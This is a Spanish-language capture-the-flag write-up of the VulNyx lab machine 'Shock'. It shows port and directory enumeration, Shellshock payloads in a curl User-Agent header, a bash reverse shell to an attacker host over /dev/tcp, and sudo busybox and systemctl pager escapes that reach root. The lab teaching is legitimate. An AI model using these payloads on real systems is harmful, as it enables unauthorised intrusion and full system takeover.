cd ~/blog

~/writeups/vulnyx/08-shock.md

08 - Shock

low Linux vulnyx 21-05-2024
Shellshock (CVE-2014-6271)sudo busybox Privescsudo systemctl Privesc
vulnyx.com

~1 min de lectura


Enumeramos puertos y directorios:

 sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.81
 nmap -sCV -p21,22,80 -oN 02-targeted.txt 192.168.1.81
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-21 18:04 -04
Nmap scan report for 192.168.1.81
Host is up (0.00055s latency).

PORT   STATE  SERVICE VERSION
21/tcp closed ftp
22/tcp open   ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
|   256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_  256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open   http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.82 seconds

Enumeramos el servicio web con dirb y vemos un directorio /cgi-bin/, lo que suele ser indicio de scripts CGI potencialmente vulnerables a Shellshock:

 dirb http://192.168.1.81/ -o dirb_results -R
...
---- Scanning URL: http://192.168.1.81/ ----
+ http://192.168.1.81/cgi-bin/ (CODE:403|SIZE:277)
+ http://192.168.1.81/index.html (CODE:200|SIZE:20)
+ http://192.168.1.81/server-status (CODE:403|SIZE:277)
...

Fuzzeamos el interior de /cgi-bin/ y damos con un script .sh:

 gobuster dir -u 'http://192.168.1.81/cgi-bin' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,sh -r
...
/shell.sh             (Status: 500) [Size: 610]
...

Un script Bash servido por CGI es el escenario perfecto para Shellshock (CVE-2014-6271). Lo confirmamos con la herramienta erinzm/shellshocker y validamos la ejecución de comandos inyectando el payload en la cabecera User-Agent:

 ./shellshocker.py http://192.168.1.81/cgi-bin/shell.sh
Testing http://192.168.1.81/cgi-bin/shell.sh with a standard payload using ShellShocker
http://192.168.1.81/cgi-bin/shell.sh is exploitable

 curl -H "User-Agent: () { :; }; echo;echo; /bin/bash -c 'id'" http://192.168.1.81/cgi-bin/shell.sh

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Convertimos la ejecución de comandos en una reverse shell:

 curl -H "User-Agent: () { :; }; echo;echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.5/1234 0>&1'" http://192.168.1.81/cgi-bin/shell.sh

 ncat -nlvp 1234
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.81:35222.
bash: cannot set terminal process group (438): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3$

La escalada de privilegios se realiza en dos saltos vía sudo. Empezamos consultando los permisos de www-data:

bash-4.3$ sudo -l
Matching Defaults entries for www-data on shock:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on shock:
    (will) NOPASSWD: /usr/bin/busybox

Podemos ejecutar busybox como el usuario will sin contraseña; usamos su applet sh para obtener una shell de will y la primera flag:

bash-4.3$ sudo -u will /usr/bin/busybox sh
/home $ ^[[40;9Rscript /dev/null -c bash
will@shock:/home$

Repetimos sudo -l como will:

will@shock:~$ sudo -l
Matching Defaults entries for will on shock:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User will may run the following commands on shock:
    (root) NOPASSWD: /usr/bin/systemctl

Podemos ejecutar systemctl como root. Aprovechamos el pager interactivo que abre systemctl para escapar a un shell de root (!/bin/bash):

will@shock:~$ sudo /usr/bin/systemctl
esc
!/bin/bash
root@shock:/home/will#

Obtenemos nuestra flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados